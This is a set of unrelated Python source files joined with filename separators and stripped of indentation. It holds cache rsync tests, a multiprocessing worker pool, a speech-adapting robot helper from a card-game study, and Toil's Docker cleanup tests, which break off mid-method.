def run(command):
print('run$ %r' % command)
try:
result = sp.check_output(command, stderr=sp.STDOUT)
print(result)
except sp.CalledProcessError as exc:
print(exc.output)
raise
def test_rsync():
try:
run(['rsync', '--version'])
except OSError:
return # No rsync installed. Skip test.
rsync_args = ['rsync', '-a', '--checksum', '--delete', '--stats']
cache_dir1 = tempfile.mkdtemp() + os.sep
cache_dir2 = tempfile.mkdtemp() + os.sep
# Store some items in cache_dir1.
with dc.FanoutCache(cache_dir1) as cache1:
for count in range(100):
cache1[count] = str(count)
for count in range(100, 200):
cache1[count] = str(count) * int(1e5)
# Rsync cache_dir1 to cache_dir2.
run(rsync_args + [cache_dir1, cache_dir2])
# Validate items in cache_dir2.
with dc.FanoutCache(cache_dir2) as cache2:
for count in range(100):
assert cache2[count] == str(count)
for count in range(100, 200):
assert cache2[count] == str(count) * int(1e5)
# Store more items in cache_dir2.
with dc.FanoutCache(cache_dir2) as cache2:
for count in range(200, 300):
cache2[count] = str(count)
for count in range(300, 400):
cache2[count] = str(count) * int(1e5)
# Rsync cache_dir2 to cache_dir1.
run(rsync_args + [cache_dir2, cache_dir1])
# Validate items in cache_dir1.
with dc.FanoutCache(cache_dir1) as cache1:
for count in range(100):
assert cache1[count] == str(count)
for count in range(100, 200):
assert cache1[count] == str(count) * int(1e5)
for count in range(200, 300):
assert cache1[count] == str(count)
for count in range(300, 400):
assert cache1[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
shutil.rmtree(cache_dir2, ignore_errors=True)
class SHA256FilenameDisk(dc.Disk):
def filename(self, key=dc.UNKNOWN, value=dc.UNKNOWN):
filename = hashlib.sha256(key).hexdigest()[:32]
full_path = op.join(self._directory, filename)
return filename, full_path
def test_custom_filename_disk():
with dc.FanoutCache(disk=SHA256FilenameDisk) as cache:
for count in range(100, 200):
key = str(count).encode('ascii')
cache[key] = str(count) * int(1e5)
disk = SHA256FilenameDisk(cache.directory)
for count in range(100, 200):
key = str(count).encode('ascii')
subdir = '%03d' % (disk.hash(key) % 8)
filename = hashlib.sha256(key).hexdigest()[:32]
full_path = op.join(cache.directory, subdir, filename)
with open(full_path) as reader:
content = reader.read()
assert content == str(count) * int(1e5)
shutil.rmtree(cache.directory, ignore_errors=True)
|
processpool.py
|
import multiprocessing
import pickle
import queue
import sys
import time
from concurrent.futures import Future
from threading import Thread
from typing import Any
from tblib import pickling_support
SLEEP_TICK = 0.001 # Duration in seconds used to sleep when waiting for results
class WorkerDiedException(Exception):
"""Raised when getting the result of a job where the process died while executing it for any reason."""
def __init__(self, message, code=None):
self.code = code
self.message = message
def __reduce__(self):
return (WorkerDiedException, (self.message, self.code))
class JobFailedException(Exception):
"""Raised when a job fails with a normal exception."""
def __init__(self, message, original_exception_type=None):
self.original_exception_type = original_exception_type
self.message = message
super().__init__(message)
def __str__(self):
return f"{self.__class__.__name__}: {self.original_exception_type}({self.message})"
def __reduce__(self):
return (JobFailedException, (self.message, self.original_exception_type))
class ProcessPoolShutDownException(Exception):
"""Raised when submitting jobs to a process pool that has been .join()ed or .terminate()d"""
pass
@pickling_support.install
class _WrappedWorkerException(Exception): # we need this since tracebacks aren't pickled by default and therefore lost
def __init__(self, exception_str, exception_cls=None, traceback=None):
# don't pickle problematic exception classes
self.exception = JobFailedException(exception_str, exception_cls)
if traceback is None:
__, __, self.traceback = sys.exc_info()
else:
self.traceback = traceback
class _WorkerHandler:
def __init__(self, worker_class: type): # Runs in the main process
self.worker_class = worker_class
self.busy_with_future = None
self.send_q = multiprocessing.Queue() # type: multiprocessing.Queue
self.recv_q = multiprocessing.Queue() # type: multiprocessing.Queue
self.process = multiprocessing.Process(
target=self._worker_job_loop, args=(self.worker_class, self.recv_q, self.send_q)
)
self.process.start()
def send(self, job):
args, kwargs, future = job
self.busy_with_future = future
try:
self.send_q.put(pickle.dumps((args, kwargs)))
except Exception as error: # pickle errors
self.recv_q.put(pickle.dumps((None, _WrappedWorkerException(str(error), error.__class__.__name__))))
def result(self):
if not self.busy_with_future:
return None
try:
ret, err = pickle.loads(self.recv_q.get(block=False))
if err:
unwrapped_err = err.exception # unwrap
unwrapped_err.__traceback__ = err.traceback
err = unwrapped_err
return ret, err
except queue.Empty:
if not self.process.is_alive():
raise WorkerDiedException(
f"{self.process.name} terminated unexpectedly with exit code {self.process.exitcode} while running job.",
self.process.exitcode,
)
return None
@staticmethod
def _worker_job_loop(
worker_class: type, recv_q: multiprocessing.Queue, send_q: multiprocessing.Queue
): # Runs in a subprocess
worker = worker_class()
while True:
args, kwargs = pickle.loads(send_q.get(block=True))
try:
result = worker.run(*args, **kwargs)
error = None
except MemoryError: # py 3.8 consistent error
raise WorkerDiedException(f"Process encountered MemoryError while running job.", "MemoryError")
except Exception as e:
error = _WrappedWorkerException(str(e), e.__class__.__name__)
result = None
try:
recv_q.put(pickle.dumps((result, error)))
except Exception as e:
error = _WrappedWorkerException(str(e), e.__class__.__name__)
recv_q.put(pickle.dumps((None, error)))
class ProcessPool:
def __init__(self, worker_class: type, pool_size: int = 1):
"""Manages dispatching jobs to processes, checking results, sending them to futures and restarting if they die.
Args:
worker_class (Class): type that will receive the jobs in it's `run` method, one instance will be created per process, which should initialize itself fully.
pool_size (int): number of worker processes to use.
"""
self.worker_class = worker_class
self.pool_size = pool_size
self.shutting_down = False
self.terminated = False
self._pool = [self._create_new_worker() for _ in range(pool_size)]
self._job_queue = queue.Queue() # type: queue.Queue # no need for a MP queue here
self._job_loop = Thread(target=self._job_manager_thread, daemon=True)
self._job_loop.start()
def _create_new_worker(self):
return _WorkerHandler(self.worker_class)
def join(self):
"""Waits for jobs to finish and shuts down the pool."""
self.shutting_down = True
if self.terminated:
raise ProcessPoolShutDownException("Can not join a WorkerPool that has been terminated")
while not self._job_queue.empty() or any(worker.busy_with_future for worker in self._pool):
time.sleep(SLEEP_TICK)
self.terminate() # could be gentler on the children
def terminate(self):
"""Kills all sub-processes and stops the pool immediately."""
self.terminated = True
for worker in self._pool:
worker.process.terminate()
self._job_queue.put(None) # in case it's blocking
def _job_manager_thread(self):
"""Manages dispatching jobs to processes, checking results, sending them to futures and restarting if they die"""
while True:
busy_procs = []
idle_procs = []
for wix, worker in enumerate(self._pool):
if worker.busy_with_future:
try:
result = worker.result()
if result is None:
busy_procs.append(wix)
continue
else:
result, exc = result
except WorkerDiedException as e:
if not self.terminated:
self._pool[wix] = self._create_new_worker() # restart worker
result, exc = None, e
if exc:
worker.busy_with_future.set_exception(exc)
else:
worker.busy_with_future.set_result(result) # Could be None
worker.busy_with_future = None # done!
else:
idle_procs.append(wix)
if not idle_procs:
time.sleep(SLEEP_TICK)
continue
if busy_procs:
try:
job = self._job_queue.get(block=False)
except queue.Empty:
time.sleep(SLEEP_TICK)
continue
else: # no jobs are running, so we can block
job = self._job_queue.get(block=True)
if job is None:
return
self._pool[idle_procs[0]].send(job)
def submit_job(self, *args, **kwargs) -> Future:
"""Submits job asynchronously, which will eventually call the `run` method in worker_class with the arguments given, all of which should be picklable."""
if self.terminated or self.shutting_down:
raise ProcessPoolShutDownException("Worker pool shutting down or terminated, can not submit new jobs")
future = Future() # type: Future
self._job_queue.put((args, kwargs, future))
return future
def run_job(self, *args, **kwargs) -> Any:
"""Submits job and blocks to wait for result. Returns the result or raises any Exception encountered. Should typically only be called from a thread."""
return self.submit_job(*args, **kwargs).result()
|
Helper.py
|
#!/usr/bin/python
from pygame.sprite import DirtySprite
import random
import time
import logging
from pygame.surface import Surface
from src.Properties import Color, Size
from tts_client import invoke_tts
from utils import *
RATE_PERCENTAGE_MAX = 25
RATE_PERCENTAGE_MIN = -25
# RANGE_PERCENTAGE_MAX = 50 # RG
# RANGE_PERCENTAGE_MIN = -50 # RG
ENERGY_PERCENTAGE_MAX = 5 # RG
ENERGY_PERCENTAGE_MIN = -5 # RG
FOMEAN_PERCENTAGE_MAX = 10 # RG
FOMEAN_PERCENTAGE_MIN = -10 # RG
#mpatacchiola: include for the robot libraries
import threading
import sys
sys.path.insert(1, "./pynaoqi-python2.7-2.1.3.3-linux64") #import this module for the nao.py module
from naoqi import ALProxy
import random #randint to generate random advice
import csv #to read the configuration file with the robot IP and PORT
#mpatacchiola: move the head
def robot_move_head(direction, sleep, avatar_name, csv_path='./robot.csv'):
"""
Move the head of the robot
I moves the head of the robot in the direction of the screen or the participant.
Before talking it looks to the participant. At the end it looks back to the screen.
It requires the robot.csv file which must contain where the participant is placed.
@param direction string identifying where to look ('screen' or 'participant')
@parma sleep how many second sleep before the movement
@param avatar_name the name of the avatar to move
@param csv_path the path of the CSV file
"""
avatar_found = False
with open(csv_path, 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
conf_avatar_name = row[0]
conf_nao_ip = row[1]
conf_nao_port = row[2]
conf_nao_movement = row[3]
conf_participant_position = row[4]
if(conf_avatar_name == avatar_name):
avatar_found = True
NAO_IP = conf_nao_ip
NAO_PORT = conf_nao_port
NAO_MOVE = conf_nao_movement
break
if(avatar_found == False):
print("ROBOT ERROR: avatar '" + str(avatar_name) + "' not found!")
return 0
try:
al_motion_proxy = ALProxy("ALMotion", NAO_IP, int(NAO_PORT))
except Exception, e:
print "ROBOT ERROR: Error creating the ALMotion proxy!"
print str(e)
#self._al_motion_proxy.setAngles("HeadPitch", angle, HEAD_SPEED)
time.sleep(sleep)
head_speed = 0.3 # change the speed if needed
if(conf_participant_position == "left" and direction=="screen"):
angle = +1.0 # 60 degrees = 1.0 radians
elif(conf_participant_position == "left" and direction=="participant"):
angle = -1.0 # 60 degrees = 1.0 radians
elif(conf_participant_position == "right" and direction=="screen"):
angle = +1.0 # 60 degrees = 1.0 radians
elif(conf_participant_position == "right" and direction=="participant"):
angle = -1.0 # 60 degrees = 1.0 radians
else:
print "ROBOT ERROR: Error the combination does not exist participant_position=" + str(conf_participant_position) + "; direction=" + str(direction)
# Move the head in the direction
if NAO_MOVE == "True" or NAO_MOVE == "true" or NAO_MOVE == "TRUE":
al_motion_proxy.setAngles("HeadYaw", angle, head_speed)
#mpatacchiola: creating the motion object
def robot_animation(advice, avatar_name, csv_path='./robot.csv', verbose=True):
"""Given the name of the avatar and an advice it animates one of the robots.
The gestures are sampled among the NAO animations.
The function will look for a file called 'robot.csv' containing:
comma separated values for [Avatar name, IP address, PORT number, MOVE True/False].
The file must be in the root folder.
@param advice the advice string
@param avatar_name the name of the avatar (Veronika, Monika, Tereza)
@param csv_path the path where the CSV file is located (default is root)
@param verbose if True it prints the steps on terminal
"""
avatar_found = False
with open(csv_path, 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
conf_avatar_name = row[0]
conf_nao_ip = row[1]
conf_nao_port = row[2]
conf_nao_movement = row[3]
if(conf_avatar_name == avatar_name):
avatar_found = True
NAO_IP = conf_nao_ip
NAO_PORT = conf_nao_port
NAO_MOVE = conf_nao_movement
break
if(avatar_found == False):
if verbose: print("ROBOT ERROR: AVATAR '" + str(avatar_name) + "' NOT FOUND!")
return 0
if verbose: print "ROBOT init..."
if verbose: print("ROBOT IP: " + str(NAO_IP))
if verbose: print("ROBOT PORT: " + str(NAO_PORT))
if verbose: print("ROBOT MOVE: " + str(NAO_MOVE))
if verbose: print("ROBOT avatar: " + str(avatar_name))
if verbose: print("ROBOT advice: " + str(advice))
# If the movements are enabled it moves during the speech
if NAO_MOVE == "True" or NAO_MOVE == "true" or NAO_MOVE == "TRUE":
animated_speech_proxy = ALProxy("ALAnimatedSpeech", NAO_IP, int(NAO_PORT))
#set the local configuration
configuration = {"bodyLanguageMode":"contextual"}
#say the text with the local configuration
gesture_list = list()
gesture_list.append("^start(animations/Stand/Gestures/Choice_1) ")
gesture_list.append("^start(animations/Stand/Gestures/Choice_2) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_1) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_2) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_4) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_6) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_7) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_8) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_9) ")
sampled_gesture = gesture_list[random.randint(0,len(gesture_list)-1)]
full_string = sampled_gesture + advice #the gesture plus the advice
animated_speech_proxy.say(full_string, configuration)
class HelperUnknownSignal(Surface):
def __init__(self, names=''):
super(HelperUnknownSignal, self).__init__(Size.HELPER_UNKNOWN_SIGNAL, pygame.SRCALPHA)
self.fill(color=Color.DIRECTION)
center_x, center_y = self.get_rect().center
mytext = _('not-understood')
line1 = largeText.render(unicode(mytext.decode('utf8')), True, Color.WHITE)
mytext = _('please-repeat')
line2 = smallText.render(unicode(mytext.decode('utf8')), True, Color.WHITE)
mytext = _('and-remember-who1')
line3 = miniText.render(unicode(mytext.decode('utf8')), True, Color.WHITE)
mytext = _('and-remember-who2') % names
line4 = miniText.render(unicode(mytext.decode('utf8')), True, Color.WHITE)
#AG line1 = largeText.render(_('not-understood'), True, Color.WHITE)
#AG line2 = smallText.render(_('please-repeat'), True, Color.WHITE)
#AG line3 = miniText.render(_('and-remember-who1'), True, Color.WHITE)
#AG line4 = miniText.render(_('and-remember-who2') % names, True, Color.WHITE)
self.blit(line1, (center_x - (line1.get_width() / 2), 10))
self.blit(line2, (center_x - (line2.get_width() / 2), 50))
self.blit(line3, (center_x - (line3.get_width() / 2), 90))
self.blit(line4, (center_x - (line4.get_width() / 2), 120))
CHARACTERS = {0: ('Tereza',
pygame.image.load('resources/characters/eugenia.png'),
'+0%', # RG it used to say +5%
pygame.image.load('resources/characters/thumb_eugenia.png'),
'Tereza'),
1: ('Monika',
pygame.image.load('resources/characters/amanda.png'),
'-10%', # RG it used to say -20%
pygame.image.load('resources/characters/thumb_amanda.png'),
'Monika'),
2: ('Veronika',
pygame.image.load('resources/characters/veronica.png'),
'+0%', # RG it used to say +5%
pygame.image.load('resources/characters/thumb_veronica.png'),
'Veronika'),#####AG:FIX!
3: ('undetermined',
HelperUnknownSignal(),
None,
None,
'')}
advice_prefixes = [_('advice-prefix-1'),
_('advice-prefix-2'),
_('advice-prefix-3'),
_('advice-prefix-4'),
_('advice-prefix-5'),
_('advice-prefix-6'),
_('advice-prefix-7'),
_('advice-prefix-8'),
_('advice-prefix-9'),
_('advice-prefix-10')]
advices_suffixes = {1: _('advice-suffix-1'),
2: _('advice-suffix-2'),
3: _('advice-suffix-3'),
4: _('advice-suffix-4'),
5: _('advice-suffix-5'),
6: _('advice-suffix-6'),
7: _('advice-suffix-7'),
8: _('advice-suffix-8'),
9: _('advice-suffix-9'),
10: _('advice-suffix-10'),
11: _('advice-suffix-11'),
12: _('advice-suffix-12'),
13: _('advice-suffix-13')}
class Helper(DirtySprite):
def __init__(self, id, game, initial_score=0):
self.game = game
super(Helper, self).__init__()
self.last_advice = 0
self.score = initial_score
self.rate = 0
# self.pitch_range = 0 # RG
self.energy = 0 # RG
self.f0mean = 0 # RG
self.id = id
self.name, self.image, self.pitch, self.thumb, self.nombre = CHARACTERS[id]
logging.info('Helper=> [%(name)s] initial score: [%(score)i]',
{'name': self.name, 'score': self.score})
self.rect = self.image.get_rect()
self.hide()
# def set_configuration(self, config):
# self.conf = config
def get_possible_advices(self):
advs = {}
possibles = list(set(values_of(self.game.human_player.hand)))
for val in possibles:
if val not in values_of(self.game.comp_player.hand):
key = -15
else:
a = cant_of_same_rank(self.game.human_player.hand, val)
b = cant_of_same_rank(self.game.comp_player.hand, val)
if a + b == 4:
key = 5
else:
key = b
# Si no esta en el dict, la creo
if key in advs:
advs[key].append(val)
else:
advs[key] = [val]
return advs
def get_an_advice(self):
advices = self.get_possible_advices()
# candidates = list(set(self.game.human_player.hand))
s = self.choose_better_advs(advices.keys())
candidates = advices[s]
self.score += s
logging.info('Helper=> [%(name)s] updated score to: [%(score)i]',
{'name': self.name, 'score': self.score})
# if not candidates:
# candidates = values_of(self.game.human_player.hand) # if no intersection between those two, random guess
return random.choice(candidates)
def speech_advice(self):
#mpatacchiola: (sharedscreen) allows the movement of the robot head (it loos to the participant)
direction = "participant"
sleep = 0.0
t = threading.Thread(target=robot_move_head, args=(direction, sleep, self.name,))
t.start()
advice = random.choice(advice_prefixes) + advices_suffixes[self.last_advice]
logging.info('Helper=> [%(nombre)s] giving advice: %(advice)s', {'nombre': self.name, 'advice': advice})
invoke_tts(filename=self.game.get_response_filename(),
rate_change=self.calculate_percentage_rate(),
# range_change=self.calculate_percentage_range(),
energy_change=self.calculate_percentage_energy(),
f0mean_change=self.calculate_percentage_f0mean(),
pitch=self.pitch,
advice=advice) # RG
#mpatacchiola: calling the robot animation function
t = threading.Thread(target=robot_animation, args=(advice, self.name,))
t.start()
#mpatacchiola: (sharedscreen) allows the movement of the robot head (it loos to the screen)
direction = "screen"
sleep = 3.0 # adjust as you want
t = threading.Thread(target=robot_move_head, args=(direction, sleep, self.name,))
t.start()
pygame.mixer.music.play()
def calculate_percentage_rate(self):
if self.rate < 0:
return str(self.rate)+'%'
else:
return '+'+str(self.rate)+'%'
# def calculate_percentage_range(self): # RG
if self.pitch_range < 0:
return str(self.pitch_range)+'%'
else:
return '+'+str(self.pitch_range)+'%'
def calculate_percentage_energy(self): # RG
if self.energy < 0:
return str(self.energy)+'%'
else:
return '+'+str(self.energy)+'%'
def calculate_percentage_f0mean(self): # RG
if self.f0mean < 0:
return str(self.f0mean)+'%'
else:
return '+'+str(self.f0mean)+'%'
def help(self):
nro = self.get_an_advice()
self.last_advice = nro
logging.info('Audio=> [%(nombre)s] giving advice: %(rank)02d', {'nombre': self.name, 'rank': nro})
self.speech_advice()
self.game.human_player.update_enabled_cards(nro)
return True
def choose_better_advs(self, keys):
score = keys[0]
for k in keys:
if abs(self.score + k) < abs(self.score + score):
score = k
return score
def hide(self):
self.visible = False
def show(self):
self.visible = True
def is_talking(self):
return pygame.mixer.music.get_busy()
class PracticeHelper(Helper):
def __init__(self, id, game, initial_score=0):
super(PracticeHelper, self).__init__(id, game, initial_score)
def adapt_rates(self, new_ap_value, ap_feature): # RG
logging.info('Audio=> Practice helper does not adapt %s', ap_feature.upper()) # RG
if ap_feature == 'rate': # RG
self.game.historic_rate.append(new_ap_value)
# elif ap_feature == 'range':
# self.game.historic_range.append(new_ap_value)
elif ap_feature == 'energy':
self.game.historic_energy.append(new_ap_value)
elif ap_feature == 'f0mean':
self.game.historic_f0mean.append(new_ap_value)
pass
class EntrainingHelper(Helper):
def __init__(self, id, game, initial_score):
super(EntrainingHelper, self).__init__(id, game, initial_score)
self.initial_rate = game.rate_base
# self.initial_range = game.range_base # RG
self.initial_energy = game.energy_base # RG
self.initial_f0mean = game.f0mean_base # RG
def adapt_rates(self, new_ap_value, ap_feature): # RG
logging.info('Audio=> ## Adapting %s ## ', ap_feature.upper()) # RG
if ap_feature == 'rate': # RG
initial_ap = self.initial_rate
percentage_max = RATE_PERCENTAGE_MAX
percentage_min = RATE_PERCENTAGE_MIN
# elif ap_feature == 'range':
# initial_ap = self.initial_range
# percentage_max = RANGE_PERCENTAGE_MAX
# percentage_min = RANGE_PERCENTAGE_MIN
elif ap_feature == 'energy':
initial_ap = self.initial_energy
percentage_max = ENERGY_PERCENTAGE_MAX
percentage_min = ENERGY_PERCENTAGE_MIN
elif ap_feature == 'f0mean':
initial_ap = self.initial_f0mean
percentage_max = FOMEAN_PERCENTAGE_MAX
percentage_min = FOMEAN_PERCENTAGE_MIN
pt = (new_ap_value - initial_ap) / initial_ap
partial = int(round(pt, 2) * 100)
ap_change = max(min(partial, percentage_max), percentage_min) # RG
if ap_feature == 'rate': # RG
self.game.historic_rate.append(new_ap_value)
self.rate = ap_change
# elif ap_feature == 'range':
# self.game.historic_range.append(new_ap_value)
# self.pitch_range = ap_change
elif ap_feature == 'energy':
self.game.historic_energy.append(new_ap_value)
self.energy = ap_change
elif ap_feature == 'f0mean':
self.game.historic_f0mean.append(new_ap_value)
self.f0mean = ap_change
logging.info('Audio=> Measured %(ap_feature)s: [%(new_ap_value)g] - Change: [%(percent_change)g percent] - Base value: [%(base_value)g]',
{'ap_feature': ap_feature, 'new_ap_value': new_ap_value, 'percent_change': ap_change, 'base_value': initial_ap}) # RG
class DisentrainingHelper(Helper):
def __init__(self, id, game, initial_score):
super(DisentrainingHelper, self).__init__(id, game, initial_score)
self.initial_rate = game.rate_base
# self.initial_range = game.range_base # RG
self.initial_energy = game.energy_base # RG
self.initial_f0mean = game.f0mean_base # RG
def adapt_rates(self, new_ap_value, ap_feature): # RG
logging.info('Audio=> ## DE-Adapting %s ## ', ap_feature.upper()) # RG
if ap_feature == 'rate': # RG
initial_ap = self.initial_rate
percentage_max = RATE_PERCENTAGE_MAX
percentage_min = RATE_PERCENTAGE_MIN
# elif ap_feature == 'range':
# initial_ap = self.initial_range
# percentage_max = RANGE_PERCENTAGE_MAX
# percentage_min = RANGE_PERCENTAGE_MIN
elif ap_feature == 'energy':
initial_ap = self.initial_energy
percentage_max = ENERGY_PERCENTAGE_MAX
percentage_min = ENERGY_PERCENTAGE_MIN
elif ap_feature == 'f0mean':
initial_ap = self.initial_f0mean
percentage_max = FOMEAN_PERCENTAGE_MAX
percentage_min = FOMEAN_PERCENTAGE_MIN
pt = (new_ap_value - initial_ap) / initial_ap
partial = int(round(pt, 2) * -100) # RG: this must be one of the most important minus signs in science! And it's well hidden!
ap_change = max(min(partial, percentage_max), percentage_min) # RG
if ap_feature == 'rate': # RG
self.game.historic_rate.append(new_ap_value)
self.rate = ap_change
# elif ap_feature == 'range':
# self.game.historic_range.append(new_ap_value)
# self.pitch_range = ap_change
elif ap_feature == 'energy':
self.game.historic_energy.append(new_ap_value)
self.energy = ap_change
elif ap_feature == 'f0mean':
self.game.historic_f0mean.append(new_ap_value)
self.f0mean = ap_change
logging.info('Audio=> Measured %(ap_feature)s: [%(new_ap_value)g] - Change: [%(percent_change)g percent] - Base value: [%(base_value)g]',
{'ap_feature': ap_feature, 'new_ap_value': new_ap_value, 'percent_change': ap_change, 'base_value': initial_ap}) # RG
class UnknownHelper(Helper):
def __init__(self, id, game):
super(UnknownHelper, self).__init__(id, game)
self.image = HelperUnknownSignal(game.helper_names)
self.clock = None
def help(self):
self.clock = time.time()
return False
def adapt_rates(self, new_ap_value, ap_feature):
logging.error('Audio=> Not adapting %(ap_feature)s because the helper is %(helper_name)s',
{'helper_name': self.name, 'ap_feature': ap_feature})
def is_talking(self):
return time.time() - self.clock < 3
|
dockerTest.py
|
# Copyright (C) 2015-2020 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import signal
import time
import os
import sys
import uuid
import docker
from threading import Thread
from docker.errors import ContainerError
from toil.job import Job
from toil.leader import FailedJobsException
from toil.test import ToilTest, slow, needs_docker
from toil.lib.docker import apiDockerCall, containerIsRunning, dockerKill
from toil.lib.docker import FORGO, STOP, RM
logger = logging.getLogger(__name__)
@needs_docker
class DockerTest(ToilTest):
"""
Tests dockerCall and ensures no containers are left around.
When running tests you may optionally set the TOIL_TEST_TEMP environment
variable to the path of a directory where you want temporary test files be
placed. The directory will be created if it doesn't exist. The path may be
relative in which case it will be assumed to be relative to the project
root. If TOIL_TEST_TEMP is not defined, temporary files and directories will
be created in the system's default location for such files and any temporary
files or directories left over from tests will be removed automatically
removed during tear down.
Otherwise, left-over files will not be removed.
"""
def setUp(self):
self.tempDir = self._createTempDir(purpose='tempDir')
self.dockerTestLogLevel = 'INFO'
def testDockerClean(self,
disableCaching=True,
detached=True,
rm=True,
deferParam=None):
"""
Run the test container that creates a file in the work dir, and sleeps
for 5 minutes.
Ensure that the calling job gets SIGKILLed after a minute, leaving
behind the spooky/ghost/zombie container. Ensure that the container is
killed on batch system shutdown (through the deferParam mechanism).
"""
# We need to test the behaviour of `deferParam` with `rm` and
# `detached`. We do not look at the case where `rm` and `detached` are
# both True. This is the truth table for the different combinations at
# the end of the test. R = Running, X = Does not exist, E = Exists but
# not running.
# None FORGO STOP RM
# rm X R X X
# detached R R E X
# Neither R R E X
data_dir = os.path.join(self.tempDir, 'data')
working_dir = os.path.join(self.tempDir, 'working')
test_file = os.path.join(working_dir, 'test.txt')
os.makedirs(data_dir, exist_ok=True)
os.makedirs(working_dir, exist_ok=True)
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir,
'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = working_dir
options.clean = 'always'
options.disableCaching = disableCaching
# No base64 logic since it might create a name starting with a `-`.
container_name = uuid.uuid4().hex
A = Job.wrapJobFn(_testDockerCleanFn,
working_dir,
detached,
rm,
deferParam,
container_name)
try:
Job.Runner.startToil(A, options)
except FailedJobsException:
# The file created by spooky_container would remain in the directory
# and since it was created inside the container, it would have had
# uid and gid == 0 (root) which may cause problems when docker
# attempts to clean up the jobstore.
file_stats = os.stat(test_file)
assert file_stats.st_gid != 0
assert file_stats.st_uid != 0
if (rm and (deferParam != FORGO)) or deferParam == RM:
# These containers should not exist
assert containerIsRunning(container_name) is None, \
'Container was not removed.'
elif deferParam == STOP:
# These containers should exist but be non-running
assert containerIsRunning(container_name) == False, \
'Container was not stopped.'
else:
# These containers will be running
assert containerIsRunning(container_name) == True, \
'Container was not running.'
client = docker.from_env(version='auto')
dockerKill(container_name, client)
try:
os.remove(test_file)
except:
pass
def testDockerClean_CRx_FORGO(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=FORGO)
def testDockerClean_CRx_STOP(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=STOP)
def testDockerClean_CRx_RM(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=RM)
@slow
def testDockerClean_CRx_None(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=None)
@slow
def testDockerClean_CxD_FORGO(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_CxD_STOP(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=STOP)
@slow
def testDockerClean_CxD_RM(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=RM)
@slow
def testDockerClean_CxD_None(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=None)
@slow
def testDockerClean_Cxx_FORGO(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_Cxx_STOP(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=STOP)
@slow
def testDockerClean_Cxx_RM(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=RM)
@slow
def testDockerClean_Cxx_None(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=None)
@slow
def testDockerClean_xRx_FORGO(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=FORGO)
@slow
def testDockerClean_xRx_STOP(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=STOP)
@slow
def testDockerClean_xRx_RM(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=RM)
@slow
def testDockerClean_xRx_None(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=None)
@slow
def testDockerClean_xxD_FORGO(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_xxD_STOP(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=STOP)
@slow
def testDockerClean_xxD_RM(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=RM)
@slow
def testDockerClean_xxD_None(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=None)
@slow
def testDockerClean_xxx_FORGO(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_xxx_STOP(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=STOP)
@slow
def testDockerClean_xxx_RM(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=RM)
@slow
def testDockerClean_xxx_None(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=None)
def testDockerPipeChain(self, disableCaching=True):
"""
Test for piping API for dockerCall(). Using this API (activated when
list of argument lists is given as parameters), commands a piped
together into a chain.
ex: parameters=[ ['printf', 'x\n y\n'], ['wc', '-l'] ] should execute:
printf 'x\n y\n' | wc -l
"""
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir, 'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = self.tempDir
options.clean = 'always'
options.caching = disableCaching
A = Job.wrapJobFn(_testDockerPipeChainFn)
rv = Job.Runner.startToil(A, options)
logger.info('Container pipeline result: %s', repr(rv))
if sys.version_info >= (3, 0):
rv = rv.decode('utf-8')
assert rv.strip() == '2'
def testDockerPipeChainErrorDetection(self, disableCaching=True):
"""
By default, executing cmd1 | cmd2 | ... | cmdN, will only return an
error if cmdN fails. This can lead to all manor of errors being
silently missed. This tests to make sure that the piping API for
dockerCall() throws an exception if non-last commands in the chain fail.
"""
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir,
'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = self.tempDir
options.clean = 'always'
options.caching = disableCaching
A = Job.wrapJobFn(_testDockerPipeChainErrorFn)
rv = Job.Runner.startToil(A, options)
